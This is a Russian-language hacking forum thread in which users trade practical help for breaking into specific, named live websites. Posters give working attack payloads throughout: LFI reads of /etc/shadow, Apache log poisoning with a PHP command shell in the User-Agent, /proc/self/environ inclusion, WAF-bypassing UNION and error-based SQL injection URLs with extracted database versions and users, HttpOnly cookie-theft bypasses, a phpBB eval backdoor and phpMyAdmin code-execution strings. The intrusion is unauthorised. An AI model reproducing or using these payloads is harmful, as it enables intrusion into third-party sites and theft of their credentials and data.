Всем привет!Исследую один сайт - присутствуют LFI, могу посмотреть /etc/shadow и т.п. Получил хэши для root и webmaster(md5(unix)) - расшифровать не удалось пока. Присутствуют XSS - в виде текста выводятся на странице, а не в виде сценария почему-то. Есть админка, но не удалось понять, что с ней такого бы сделать. Кстати, при просмотре конфига apache удалось узнать что при доступе http://site/info_remote.php редирект происходит на другой сайт...не понял зачем это вообще.

ОС Gentoo.

Не удалось на целевом сайте найти php.ini

Подскажите, куда дальше двигаться, хотелось бы шелл получить, не могу понять, как при существующих уязвимостях это сделать. Как можно использовать XSS?

Спасибо за внимание.

antichat уже недельку читаю...опыта особо нет.

gateout said:
antichat уже недельку читаю...опыта особо нет.


http://hpc.name/thread/30214/p1.html

gateout said:
Всем привет!Исследую один сайт - присутствуют LFI, могу посмотреть /etc/shadow и т.п. Получил хэши для root и webmaster(md5(unix)) - расшифровать не удалось пока. Присутствуют XSS - в виде текста выводятся на странице, а не в виде сценария почему-то. Есть админка, но не удалось понять, что с ней такого бы сделать. Кстати, при просмотре конфига apache удалось узнать что при доступе http://site/info_remote.php редирект происходит на другой сайт...не понял зачем это вообще.
ОС Gentoo.
Не удалось на целевом сайте найти php.ini
Подскажите, куда дальше двигаться, хотелось бы шелл получить, не могу понять, как при существующих уязвимостях это сделать. Как можно использовать XSS?
Спасибо за внимание.
antichat уже недельку читаю...опыта особо нет.


Через LFI зацепить self/environ и попробовать залить шелл, через тот же LFI посмотреть скрипт авторизации админки - узнаешь как минимум где хранится конфиг от бд, далее считываешь конфиг от бд и пытаешься приконнектиться. Если же зальёшь шелл через LFI - всё остальное просто пустяки.

Приблизительный вектор атаки почитай тут (https://rdot.org/forum/showthread.php?t=343)

gateout, через LFI исчи конфиг подкл. к БД, пасс админа тоже мб в конфигах.

Спасибо большое за ответы. Файлы подключения к БД искал. Кстати, админка находится на том же ip, но с другим DNS в конфигах Apache вообще не нашел ее описания.

Искал файлы с конфигурацией подключения к БД, но не нашел. Кстати вопрос: а есть возможность просматривать содержание директории, так угадать название файла довольно таки сложно, то есть:

Знаю, что root-директория сайта /home/webmaster/site.com/htdoc/, а как дальше смотреть конкретные файлы, не зная их названия.

Системный файлы - это без проблем, а эти могут носить любое название.

Не понял, что такое self/environ...

Спасибо большое)

Не понял, что такое self/environ...


На ютубе глянь видео по этому поводу, суть в том что ты передаешь в User-Agent php коди инклюдишь его из, self/environ...

Ereee,

Ничего я не нашел к сожалению .... есть ещё варианты как просмотреть содержимое файла на HTML или Javascript, а может на VBScript есть ?

gateout said:
Не понял, что такое self/environ...


Пункт ProcFS по ссылке выше (https://rdot.org/forum/showthread.php?t=343) точно читал?

Вопрос к знающим.

Подскажите что можно сделать с такой ситуацией.

Есть дыра в виде чтения любых файлов в системе через


http://www.site.com/index?file=/../../../../../../../../../../../proc/self/fd/2


НО есть нюанс, содержимое не отображается в браузере, а скачивается.

Система jboss-4.2.2.GA, крутится на Apache Tomacat

Стоит для блога WordPress, а так же Drupal


Но, все бы хорошо, прочитал нужный файл и залез, но админка вордпреса и друпала закрыта и фильтрует доступ по IP, все другие админки так же фильтруются по IP.

Посоветуйте у кого есть какие идеи, что можно сделать в такой ситуации?

Файл просто скаичвается или выполняется перед скачиванием? Пробывал X-Forwarded-For(X-Real-IP etc.)?

UPD. Phpmyadmin есть? Если есть, прочитай конфиги и пробуй RCE:

https://rdot.org/forum/showthread.php?t=286&page=2

Удалось получить доступ к логам web-сервера. Кстати, такой момент у меня это получается сделать только если редактирую запросы в webscarabe

attachment/..%252F..%252F..%252F..%252F..%252F..%252F..%252F. .%252F..%252F..%252Fvar%252Flog%252Fapache2%252Fsi te.com_errors.log%2500.jpg

а через браузер double url encode не получается сделать, и ответ в браузер не выводится, а только в WEB-scarabe.

Как то можно это обойти? получится ли у меня при заливке шелла обойти как то этот момент?

Я так понимаю мне необходимо теперь проинклудить файлы логов с использованием user-agent?

Ereee said:
Файл просто скаичвается или выполняется перед скачиванием? Пробывал X-Forwarded-For(X-Real-IP etc.)?
UPD. Phpmyadmin есть? Если есть, прочитай конфиги и пробуй RCE:
https://rdot.org/forum/showthread.php?t=286&page=2


IP фильтруется в httpd.conf, X-Forwarded-For в этом случае может помочь? и можно подробнее о нем, а то что-то я не очень понимаю как правильно нужно его использовать.

Как проверить скачивается или выполняется?

Phpmyadmin если где-то и есть, то я не нашел его, хотя просканил на папки все, короче в явном виде не доступен.

AKYLA said:
IP фильтруется в httpd.conf, X-Forwarded-For в этом случае может помочь? и можно подробнее о нем, а то что-то я не очень понимаю как правильно нужно его использовать.
Phpmyadmin если где-то и есть, то я не нашел его, хотя просканил на папки все, короче в явном виде не доступен.


Некоторые скрипты верят X-Forwarded-For, и можно передать хидер:

X-Forwarded-For: 1.1.1.1

Или(если установлен какой-то модуль, название не помню):

X-Real-IP: 1.1.1.1

Где 1.1.1.1 это айпи админа.


Code:
Как проверить скачивается или выполняется?

Например ../../var/www/index.php, тебе скачивается файл index.php, в нем есть "" ? Или html-код главный страницы?

попробовал include в логи apache на тестовом сервере (параметр user-agent). Действительно в логи записалась строчка 10.200.16.52 - - [15/Jul/2012:18:53:50 +0400] "GET /shell2/ HTTP/1.1" 200 54855 "-" , захожу через браузер в http://testsite.comf/shell2/access_log?cmd=phpinfo(); а apache php-скрипт по ходу не отрабатывает, а вываливает содержание лога(то есть в виде текста).

Может быть я что-то не так сделал?

gateout said:
попробовал include в логи apache на тестовом сервере (параметр user-agent). Действительно в логи записалась строчка 10.200.16.52 - - [15/Jul/2012:18:53:50 +0400] "GET /shell2/ HTTP/1.1" 200 54855 "-" , захожу через браузер в http://testsite.comf/shell2/access_log?cmd=phpinfo(); а apache php-скрипт по ходу не отрабатывает, а вываливает содержание лога(то есть в виде текста).
Может быть я что-то не так сделал?


мб файлы не инклюдяться, а просто выводиться содержимое?

в смысле не инклудяться?в логе же появляется php-скрипт, ток вот через браузер он не выполняется, а просто показывается содержимое лога, включая php-код. Если изменить файл лога на файл с расширением .php php-скрипт отрабатывается.

Но это я на тестовом сервере могу сделать(переименовать файл), а на удаленном не получится. Там access_log как был так и останется, как же php-скрипт внутри логов исполнить???

Ereee said:
Некоторые скрипты верят X-Forwarded-For, и можно передать хидер:
X-Forwarded-For: 1.1.1.1
Или(если установлен какой-то модуль, название не помню):
X-Real-IP: 1.1.1.1
Где 1.1.1.1 это айпи админа.


Увы это не прокатывает, так как фильтрация идет Апачем


Ereee said:
Например ../../var/www/index.php, тебе скачивается файл index.php, в нем есть "" ? Или html-код главный страницы?


Ааа в этом плане, нет скачиваются именно исходники, не выполненные, соответственно можно посмотреть все исходники и настройки сервака и.т.д но проблема в том, что узнать то все это можно, но войти с этими данными никуда нельзя из-за фильтрации админок по IP,

- порты тоже все прикрыты кроме 80 и 443

- соседних сайтов тоже никаких нет, на серваке только один портал

- сервисов каких либо тоже нет больше

В продолжение:

нашел такой скрипт со следующим содержанием

private $prepared_queries = null;

private $db;

private function __construct($name)

{

$config = BebopConfig::getInstance();

$cfg_root = 'db.'.$name.'.';

$this->prepared_queries = array();

$this->db = new PDO(

$config->getVar($cfg_root.'dbtype').':'.$config->getVar($cfg_root.'dsn'),

$config->getVar($cfg_root.'user'),

$config->getVar($cfg_root.'password')

);

$this->db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);

$this->db->setAttribute(PDO::MYSQL_ATTR_USE_BUFFERED_QUERY, 1);

$this->db->exec("SET NAMES utf8");

}

public static function getInstance($name = 'live')

{

if (!array_key_exists($name, self::$instances)) {

self::$instances[$name] = new PDO_Singleton($name);

ника не могу определить имя файла, в котором предположительно настройки для подключения к БД хранятся, я так понимаю имя файл начинается с new PDO

на сайт в логи apache засунул через User-agent

'; if(isset($_GET['cmd'])) system($_GET['cmd']); ?>

Захожу http://site.com/attachment/..%252F..%252F..%252F..%252F..%252F..%252F..%252F. .%252F..%252F..%252Fvar%252Flog%252Fapache2%252Fsi te.ru_custom.log%2500.jpg

и вижу содержимое лог файла включая

91.221.56.225 - - [15/Jul/2012:21:47:24 +0400] "GET / HTTP/1.1" 200 64697 "-" "'; if(isset($_GET['cmd'])) system($_GET['cmd']); ?>"

Но php-получается не исполняется. Что делать?

gateout

Нет PDO расширение для php, интерфейс для доступа с различным базам данных

gateout

>new PDO

Это создание нового объекта. Смотри функцию getVar.

>php-получается не исполняется

Уверен, что у тебя инклуд, а не обычное чтение файлов?

в модуле блогов на phpbb нашел xss(пасивку), но почему-то кроме настроек чата и phpsession больше ничего на сниффер не приходит.

вот сама xss (http://tonkiimir.ru/blog.php?u=11733&b=349&r=258">alert(document.cookie))

gateout said:
на сайт в логи apache засунул через User-agent
'; if(isset($_GET['cmd'])) system($_GET['cmd']); ?>
Захожу http://site.com/attachment/..%252F..%252F..%252F..%252F..%252F..%252F..%252F. .%252F..%252F..%252Fvar%252Flog%252Fapache2%252F_c ustom.log%2500.jpg
и вижу содержимое лог файла включая
91.221.56.225 - - [15/Jul/2012:21:47:24 +0400] "GET / HTTP/1.1" 200 64697 "-" "'; if(isset($_GET['cmd'])) system($_GET['cmd']); ?>"
Но php-получается не исполняется. Что делать?


Ты спалил URL

Я тоже попробывал проинклюдить логи, но там не инклюд, а читалка. Теперь читай конфиги => phpmyadmin => пароль админа => admin.твой_сайт.ru.

Да, я понял, что не include (к сожалению поздновато). посмотрю по поводу phpMyadmin. Подправил сообщение с сайтом)промашка вышла, спасибо.

Подскажите что можно сделать при найденном sql выдало ошибку:


Code:
Script: /index.php
Line: 138
Error(1062):Duplicate entry '4CuiUaxdwIo1' for key 'group_key'
in query: UPDATE mod_offers SET count_out=(count_out+1) WHERE id=''and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(105),CHAR( 85),CHAR(97),CHAR(120),CHAR(100),CHAR(119),CHAR(73 ),CHAR(111)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and''

ex'pert said:
Подскажите что можно сделать при найденном sql


Взломать!

ex'pert said:
Подскажите что можно сделать при найденном sql выдало ошибку:

Code:
Script: /index.php
Line: 138
Error(1062):Duplicate entry '4CuiUaxdwIo1' for key 'group_key'
in query: UPDATE mod_offers SET count_out=(count_out+1) WHERE id=''and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(105),CHAR( 85),CHAR(97),CHAR(120),CHAR(100),CHAR(119),CHAR(73 ),CHAR(111)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and''





OxoTnik said:
Взломать!


Доработать скрипт, поставить фильтрации, сделать какую нить систему логов которая при ошибках админу давала знать о выявленых ошибках, смотря с какой стороны тут посмотреть)))

phpmyadmin на сайте не оказалось, насколько я понял. Нашел параметры подключения к БД, но логины/ пароли цепляются из БД. подскажите, куда дальше двигаться?

то есть исходные данные:

1) есть читалка, то есть могу прочитать данный из файлов на сервере.

2) есть phpinfo

3) есть параметры подключения к БД,

как продолжить атаку?

gateout said:
phpmyadmin на сайте не оказалось, насколько я понял. Нашел параметры подключения к БД, но логины/ пароли цепляются из БД. подскажите, куда дальше двигаться?
то есть исходные данные:
1) есть читалка, то есть могу прочитать данный из файлов на сервере.
2) есть phpinfo
3) есть параметры подключения к БД,
как продолжить атаку?


Читай сорцы двига, ищи еще баги

Не могу обойти WAF...


http://www.tpsftz.org/page.php?programmes&cat=5&subcat=1+un/**/ion+sel/**/ect+1,2,3,4,5,6,7,8,9,10,11,12,13--


- OK но не выводит


http://www.tpsftz.org/page.php?programmes&cat=5&subcat=1/*UnIoN*/union/*SeLecT*/select+1,2,3,4,5,6,7,8,9,10,11,12,13/*


- 403


http://www.tpsftz.org/page.php?programmes&cat=5&subcat=999999.-999+1+union+%28select+1,2,3,4,5,6,7,8,9,10,11,12,1 3%29--+


- OK но не выводит

Вопрос: как обойти?

aydin-ka said:
Не могу обойти WAF...
-
OK
но не выводит
-
403
-
OK
но не выводит
Вопрос: как обойти?



http://www.tpsftz.org/page.php?programmes&cat=5&subcat=1'+union%23%0aselect+1,2,3,4,5,6,7,8,9,10,1 1,12,13--+f

там string, кавычку не убирай.

2aydin-ka


http://www.tpsftz.org/page.php?cat=5&subcat=-107'+union(select+1,2,3,4,5,6,7,8,9,user(),11,12,1 3)+--+

jasp3r said:
в модуле блогов на phpbb нашел xss(пасивку), но почему-то кроме настроек чата и phpsession больше ничего на сниффер не приходит.


httpOnly запрещает чтение Cookie через JS.

M_script said:
httpOnly запрещает чтение Cookie через JS.


Спасибо, а есть возможность обойти это?

HeBepHyCb said:
Вот нашел я активную XSS-ку ...но меня не интересуют куки ....мне до корней сайта охота добраться, до базы и всего прочего.


XSS выполняется на стороне клиента. Выполнить код на сервере непосредственно через эту уязвимость нельзя.

jasp3r said:
Спасибо, а есть возможность обойти это?


1) Метод TRACE

2) Уязвимость веб-сервера

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0053

3) Плагины браузера

http://seckb.yehg.net/2012/06/xss-gaining-access-to-httponly-cookie.html

M_script said:
1) Метод TRACE
2) Уязвимость веб-сервера
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0053
3) Плагины браузера
http://seckb.yehg.net/2012/06/xss-gaining-access-to-httponly-cookie.html


Буду пробовать.

Еще в этом phpbb нашел такую штуку, в настройках юзера, там где формат даты вручную можно вводить, ввожу "> - выдает ошибку mysql:

SQL ERROR [ mysql4 ]

Data too long for column 'user_dateformat' at row 1 [1406]

при этом дата на форуме выглядит теперь вот так

https://dl.dropbox.com/u/47514335/21313.png

Можно ли раскрутить до уязвимости?

Стоит там еще ajax chat у них, файл install не удалили, но максимум что с его помощью можно сделать, это выкинуть всех из чата, может я что-то еще не попробовал? Подсобите

jasp3r said:
Буду пробовать.
Еще в этом phpbb нашел такую штуку, в настройках юзера, там где формат даты вручную можно вводить, ввожу "> - выдает ошибку mysql:
SQL ERROR [ mysql4 ]
Data too long for column 'user_dateformat' at row 1 [1406]
при этом дата на форуме выглядит теперь вот так
https://dl.dropbox.com/u/47514335/21313.png
Можно ли раскрутить до уязвимости?
Еще в репутации, похоже нифига не фильтруется, но и вывода там видимо нет:
http://tonkiimir.ru/reputation.php?u=-1+UNION+SELECT+1
Стоит там еще ajax chat у них, файл install не удалили, но максимум что с его помощью можно сделать, это выкинуть всех из чата, может я что-то еще не попробовал? Подсобите




Code:
http://tonkiimir.ru/reputation.php?u=3+or(1)group+by(concat(version(), 0x00,floor(rand(0)*2)))having(min(0)or(1))--+

Duplicate entry '5.1.58-1ubuntu1-log' for key 'group_key' [1062]

M_script said:
XSS выполняется на стороне клиента. Выполнить код на сервере непосредственно через эту уязвимость нельзя.


Ок, тогда не подскажете, как обойти фильтрацию такого рода:

Пишу сохраняется как

Если пишу <? phpinfo() ?> то сохраняется в исходном коде точно так же, а выводится на странице нормально т.е. , но не исполняется (( Как же тогда его туды вставить ?

1. Выключена обработка РНР в файлах где Вы пытаетесь его вставить.

2. short_open_tag = off

3. Попробуйте варианты {php}{/php}, ну и тому подобные, в некоторых шаблонах проходят такие варианты кода! Да и убедитесь, что тот кусок куда Вы вставляете код, не выводится системой через echo... Боюсь потому у вас и идет вывод на страницу кода РНР!

P.S. Вариантов куда больше, думайте не много и сами...

в phpbb3 хэш 34 символа(вместе с $H$) в моем случае вывод максимум 31 символ

можно ли как-то сделать, чтобы выводило после 3го символа, т.е. без $H$ ?

http://www.mysql.ru/docs/man/String_functions.html#MID

Expl0ited said:
http://www.mysql.ru/docs/man/String_functions.html#MID


все получилось, спасибо

Ребятки, прошу, помгите плиз.

Нужно залить шелл через Ajex.FileManager v1.0

+ В админке есть следующий текстовый редактор CKEditor 3.6.3 (revision 7474).

Если кто-то знает как залить прошу откликнуться.

http://www.exploit-db.com/exploits/17644/

Pirotexnik said:
http://www.exploit-db.com/exploits/17644/


К сожалению, тут попались админы-параноики.

Таких путей нет и в помине:


Code:
http://target.com/FCKeditor/editor/filemanager/upload/test.html
http://target.com/FCKeditor/editor/filemanager/browser/default/connectors/test.html

skier529 said:
К сожалению, тут попались админы-параноики.
Таких путей нет и в помине:

Code:
http://target.com/FCKeditor/editor/filemanager/upload/test.html
http://target.com/FCKeditor/editor/filemanager/browser/default/connectors/test.html



Если WP, то что мешает скачать плагин и посмотреть начинку, например:


http://desireadifference[dot]com/training/wp-content/plugins/fckeditor-for-wordpress-plugin/

Нашёл ошибку http://www.european-athletics.org/favicon.ico/.php

можно ли раскрутить, если это скуля или другие варианты

eclipse92 said:
Нашёл ошибку http://www.european-athletics.org/favicon.ico/.php
можно ли раскрутить, если это скуля или другие варианты


Это не инъекция

MaxFast said:
Это не инъекция


а что тогда?

eclipse92 said:
а что тогда?


Не более чем раскрытие путей. Баги с NGinx На этом серваке нет.

Ребят,долго мужусь с одним сайтом,помогите,плз...

Есть очень "тонкий" LFI с open_basedir,magic-qotes и т.п....


Code:
http://www.parom.hu/main.tars?page=/proc/version

+ есть phpinfo() на этом же серваке


Code:
http://www.loveland.ro/p.php

но из-за фильтрации кавычек нулл-байт отпадает,а со слэшами у меня что-то не выходит...Попробуйте заинклудить что-нибудь,плз,ребят и если у кого получится,расскажите,пожал уйста,как ((? ))

HeaVeNSeR said:
Ребят,долго мужусь с одним сайтом,помогите,плз...
Есть очень "тонкий" LFI с open_basedir,magic-qotes и т.п....

Code:
http://www.parom.hu/main.tars?page=/proc/version

+ есть phpinfo() на этом же серваке

Code:
http://www.loveland.ro/p.php

но из-за фильтрации кавычек нулл-байт отпадает,а со слэшами у меня что-то не выходит...Попробуйте заинклудить что-нибудь,плз,ребят и если у кого получится,расскажите,пожал уйста,как ((?
))


Может тут (https://rdot.org/forum/showthread.php?t=1134) есть ответ ?

LFI + PHPINFO()

BigBear said:
Может
тут (https://rdot.org/forum/showthread.php?t=1134)
есть ответ ?
LFI + PHPINFO()


как раз оттуда скрипт и использовал) в /tmp файл создается,но заинклудить его не получается...((

Есть ли актуальные обходы HttpOnly?

Dad69 said:
Есть ли актуальные обходы HttpOnly?


/threadnav46016-2102-10.html (https://antichat.live/threads/46016/page-2102/)

Подскажите, вот я подобрал через order by нужное количество, чтоб ошибка не вываливалась, а потом при использовании union select n/* всё равно вываливается ошибка ...куда дальше двигаться ?

to HeBepHyCb

Error-based метод!

У вас параметр используется в нескольких запросах!

HeBepHyCb said:
я подобрал через order by нужное количество, чтоб ошибка не вываливалась, а потом при использовании union select n/* всё равно вываливается ошибка


Несколько запросов к базе с разным количеством полей.

попробуй вместо /* поставить --

cat1vo, M_script, crookwach


Спасибо... буду рыть дальше ...

crookwach


попробуй вместо /* поставить --


не канает, даже order by не удаётся так подобрать, сразу ошибки ...

HeBepHyCb said:
Спасибо... буду рыть дальше ...
crookwach
не канает, даже order by не удаётся так подобрать, сразу ошибки ...


Долго писал ответ с разными вариантами, но потом вспомнил, про старый пост Джока по этой теме:

/threadnav43966-5-10.html

пост #48 - #50

если я правильно понял проблему

HeBepHyCb said:
не канает, даже order by не удаётся так подобрать, сразу ошибки ...


group by как альтернатива много раз выручал, не стоит всегда зацикливаться лишь на order by.

HeaVeNSeR said:
как раз оттуда скрипт и использовал) в /tmp файл создается,но заинклудить его не получается...((


тестировал предложенный по ссылке скрипт, он не верно номер файла в директории tmp показывает, поэтому ты проинклудить не можешь + файл очень быстро удаляется из директории tmp - ище более продвинутые скрипты) или сам напиши)

BigBear said:
group by
как альтернатива много раз выручал, не стоит всегда зацикливаться лишь на order by.


Я имел ввиду что знак комментария "--" вместо "/*" не катируется в моём примере, ошибки сыпятся.

А с тобой согласен, больше вариантов - больше возможностей успешно провести инжект.

Позже попробую вариант от h00lyshit!, за что ему спасибо!

HeBepHyCb said:
Я имел ввиду что знак комментария "--" вместо "/*" не катируется в моём примере, ошибки сыпятся.


На всякий случай напомню, что после "--" должен обязательно быть пробел "--+"

Ребят,возможно ли раскрутить скулю здесь? стоят фильтры(точно на select)


http://www.sexzone.ro/search_get_residences.php?id=%2527

Имхо WSO, остольные необходимые примочки что нехватает всегда можно привезать!!!

Какие к примеру примочки?

Подскажите пожалуйста как вводить и хранить пароли юзеров в mysql?

у меня скрипт, есть регистрация. как при регистрации сохранять пароли в бд? фильтровать что-нибудь надо?

Kruzak said:
Подскажите пожалуйста как вводить и хранить пароли юзеров в mysql?
у меня скрипт, есть регистрация. как при регистрации сохранять пароли в бд? фильтровать что-нибудь надо?


Главное не хранить в открытом виде, а хранить в виде хеш свертки, к примеру md5, sha-1 и т.п.

Если ты приверженец защиты своих юзеров, то безопаснее с точки зрения невозможности раскрытия их паролей хранить их в БД к примеру в виде sha1(md5($password, $salt)) или что-то подобное.

ну это понятно, меня больше интересует возможно ли как нибудь сделать sql inj при регистрации

Kruzak said:
ну это понятно, меня больше интересует возможно ли как нибудь сделать sql inj при регистрации


Строковые параметры, которые передаешь в SQL запрос из скрипта, обрабатывай функцией mysql_real_escape_string. Те параметры, которые должны быть целочисленными, приводи к типу int. После этого инъекций не будет.

Заранее сорри если миллион раз обсуждалось = \

Собсно вопрос по заливке шелла в phpbb 2.0.20

Вообщем гуглил, и находил только один способ... через востановление бд

FILE_P > Y

Вообщем создаю файл 1.sql в нем код:


UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:eval(stripslashes($_REQUEST[c]));' WHERE user_id=2;


Востанавливаю БД. Пишет востановилась...

захожу..

http://forum/profile.php?mode=editprofile&с=phpinfo();

phpinfo не выводится = \ что не так ???

help... или подскажите еще какой способ заливки)

Не пинать сильно) давно не занимался такими делами)

GroM88 said:
Заранее сорри если миллион раз обсуждалось = \
Собсно вопрос по заливке шелла в phpbb 2.0.20
Вообщем гуглил, и находил только один способ... через востановление бд
FILE_P > Y
Вообщем создаю файл 1.sql в нем код:
Востанавливаю БД. Пишет востановилась...
захожу..
http://forum/profile.php?mode=editprofile&с=phpinfo();
phpinfo не выводится = \ что не так ???
help... или подскажите еще какой способ заливки)
Не пинать сильно) давно не занимался такими делами)


ID у юзера, за которого ты залогинен - 2?

да, 2

еще вопрос, как в phpbb 2.0.20 раскрыть пути?)

Курил форум) много чего пробовал) не помогло = \

Есть сайт, на нем phpMyAdmin 2.11.8.1

Уязвимость описана к нему тут _/showpost.php?p=871193&postcount=5

Заюзал ее, но что должно произойти? Я так так понимаю на экран должен выпать пасс и логин? Не чиго не происходит

Что я не так делаю?

Там кое что стоящее , если что могу поделиться .

В общем прошу направить меня!!

WendM said:
Есть сайт, на нем phpMyAdmin 2.11.8.1
Уязвимость описана к нему тут _/showpost.php?p=871193&postcount=5
Заюзал ее, но что должно произойти? Я так так понимаю на экран должен выпать пасс и логин? Не чиго не происходит
Что я не так делаю?
Там кое что стоящее , если что могу поделиться
.
В общем прошу направить меня!!




Выполнение произвольного PHP-кода на сервере, включая вызов внешних команд через PHP-функцию exec().




Code:
http://www.example.com/server_databases.php?pos=0&dbstats=0&sort_by="]) OR "PHP" //&sort_order=desc&token=[valid token]

wkar said:

Code:
http://www.example.com/server_databases.php?pos=0&dbstats=0&sort_by="]) OR "PHP" //&sort_order=desc&token=[valid token]



Спасиб за ответ, но что то не идет. Пробывал вызвать phpinfo()

Так


Code:
/server_databases.php?pos=0&dbstats=0&sort_by="]) OR //&sort_order=desc&token=[valid token]

и так


Code:
/server_databases.php?pos=0&dbstats=0&sort_by="]) OR phpinfo(); //&sort_order=desc&token=[valid token]

и так


Code:
/server_databases.php?pos=0&dbstats=0&sort_by="]) OR phpinfo() //&sort_order=desc&token=[valid token]

Но результат нулевой

Что я не так делаю?

Token получаю так, ввожу левый пасс и логин, выдает ошибку но в браузерной строке есть токен, его и юзаю

попробуй


Code:
server_databases.php?pos=0&dbstats=0&sort_by="]) OR exec('ls -la'); //&sort_order=desc&token=[valid token]

wkar said:
попробуй

Code:
server_databases.php?pos=0&dbstats=0&sort_by="]) OR exec('ls -la'); //&sort_order=desc&token=[valid token]



Не, ни че не произошло.

А что должно было получиться?

Сервер Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny13 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g Server at site.ru Port 80

вывод каталога. мб бага закрыта

wkar said:
вывод каталога. мб бага закрыта


Может сам глянешь?

UPD Отправил ЛС

подскажите что нужно сделать?

посчитал сколько полей, вот создаю такой запрос (http://site.ru/index.php?tur=-999'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22+--+) и у меня почему то появляется белая страничка

Подскажите что нужно сделать?

Hapk said:
подскажите что нужно сделать?
посчитал сколько полей, вот создаю такой запрос (http://site.ru/index.php?tur=-999'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22+--+) и у меня почему то появляется белая страничка
Подскажите что нужно сделать?


дать линк

сейчас попробую через Havij прогнать если нечего не получится тогда линк дам

d1v said:
дать линк


вот линк http://betz.su/myturnir/turnir.php?tur=-455'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22+--+

Hapk said:
вот линк http://betz.su/myturnir/turnir.php?tur=-455'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22+--+


http://betz.su/myturnir/turnir.php?tur=455%27+and+substring((@@version),1, 1)='5

user: root@localhost

MySQL: 5.1.61-0ubuntu0.10.10.1

DB: u42397_city

Hapk said:
вот линк http://betz.su/myturnir/turnir.php?tur=-455'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22+--+


фильтруется select и union

Melfis said:
фильтруется select и union


и что теперь нечего нельзя сделать?

Hapk said:
и что теперь нечего нельзя сделать?


Чем тебя мой вариант (https://antichat.live/showpost.php/p/3223123/postcount/21063/) не устраивает ?

BigBear said:
Чем тебя
мой вариант (https://antichat.live/showpost.php/p/3223123/postcount/21063/)
не устраивает ?


http://betz.su/myturnir/turnir.php?tur=455%27+and+substring((@@version),1, 1)='5

Нет нечего

Hapk said:
http://betz.su/myturnir/turnir.php?tur=455%27+and+substring((@@version),1, 1)='5
Нет нечего


Blind MySQL-Injection ? Не слышал, не ?

А тут (https://antichat.live/showpost.php/p/161944/postcount/2/) читал ??

BigBear said:
Blind MySQL-Injection ? Не слышал, не ?
А
тут (https://antichat.live/showpost.php/p/161944/postcount/2/)
читал ??


а ты читал что


Melfis said:
фильтруется select и union


, а стало быть подзапросы не работают?

Как обойти зашиту от Spaceweb?

У меня такой запрос:


PHP:
http://site.ru/news_view.php?id=-189'+union+select+1,2,3,4,5,6,7,file_priv,9+from+m ysql.user+--+

Но после выполняется редирект на сайт Spaceweb, как обойти это?

MaxFast said:
Как обойти зашиту от Spaceweb?
У меня такой запрос:

PHP:
http://site.ru/news_view.php?id=-189'+union+select+1,2,3,4,5,6,7,file_priv,9+from+m ysql.user+--+

Но после выполняется редирект на сайт Spaceweb, как обойти это?


Попытаться вызвать ошибку, например используя extravalue()

MaxFast said:
Как обойти зашиту от Spaceweb?
У меня такой запрос:

PHP:
http://site.ru/news_view.php?id=-189'+union+select+1,2,3,4,5,6,7,file_priv,9+from+m ysql.user+--+

Но после выполняется редирект на сайт Spaceweb, как обойти это?


http://site.ru/news_view.php?id=-189'+union%0Aselect+1,2,3,4,5,6,7,file_priv,9+from +mysql.user+--+

Добрый день, я совсем новичок, и вот нашел парсером скуль и начал пробовать вот так:


Code:
http://prazdnik.com.ua/index.php?id=54&pid=3509+order+by+10/*
http://prazdnik.com.ua/index.php?id=54&pid=3509+order+by+10
http://prazdnik.com.ua/index.php?id=54&pid=3509+order+by+10
http://prazdnik.com.ua/index.php?id=54&pid=-3509+order+by+10/*
http://prazdnik.com.ua/index.php?id=54&pid=1+order+by+10
http://prazdnik.com.ua/index.php?id=54&pid=-1+order+by+10
http://prazdnik.com.ua/index.php?id=54&pid=1+union+select+1,2,3,4,5

и т.д.

Но нужных ошибок я все равно не получил, кто может раскрутите, покажите и ткните что я неправильно сделал

to compod

http://prazdnik.com.ua/index.php?id=54&pid=3509-9999.9+union+select+111111,version(),33333333,4444 4444,555555,6666666,7777777,8888888,9999999,10,11, 12,13,14,15--+f

Вывод в исходном коде на 399 строке

либо в середине страницы

5.0.51a-24+lenny5-log

http://prazdnik.com.ua/index.php?id=54&pid=3509+union+select+1,version(),3,4,5,6,7,8,9,10 ,11,12,13,14,15--

Самые забавные первоапрельские розыгрыши 2013 на телефон

5.0.51a-24+lenny5-log

shell_c0de said:
http://prazdnik.com.ua/index.php?id=54&pid=3509+union+select+1,version(),3,4,5,6,7,8,9,10 ,11,12,13,14,15--
Самые забавные первоапрельские розыгрыши 2013 на телефон
5.0.51a-24+lenny5-log


а как ты узнал что выводиться именно вторая колонка?

/thread43966.html

читай полностью.

именно пункт "2.1.2 Определение выводимых столбцов"

compod said:
а как ты узнал что выводиться именно вторая колонка?


Интуиция (https://antichat.live/threads/43966/)

http://www.cheaz-sms.ru/index.php?p=gallerypic&img_id=-10/*!union%23%0aselect+1,2,3,table_name,5,6,7,8,9*/from%23%0ainformation_schema.tables--+f&galid=1&area=1&ascdesc=desc

Фильтруется точка,как нибудь обойти можно?

a.dimka said:
http://www.cheaz-sms.ru/index.php?p=gallerypic&img_id=-10/*!union%23%0aselect+1,2,3,table_name,5,6,7,8,9*/from%23%0ainformation_schema.tables--+f&galid=1&area=1&ascdesc=desc
Фильтруется точка,как нибудь обойти можно?


http://www.cheaz-sms.ru/index.php?p=gallerypic&img_id=-10 /*!union*//*!select*/ 1,2,3,(select table_name from `information_schema`.`tables` limit 1),5,6,7,8,9&galid=1&area=1&ascdesc=desc

Пытаюсь заюзать вот этот эксплоит _/showpost.php?p=2748145&postcount=24

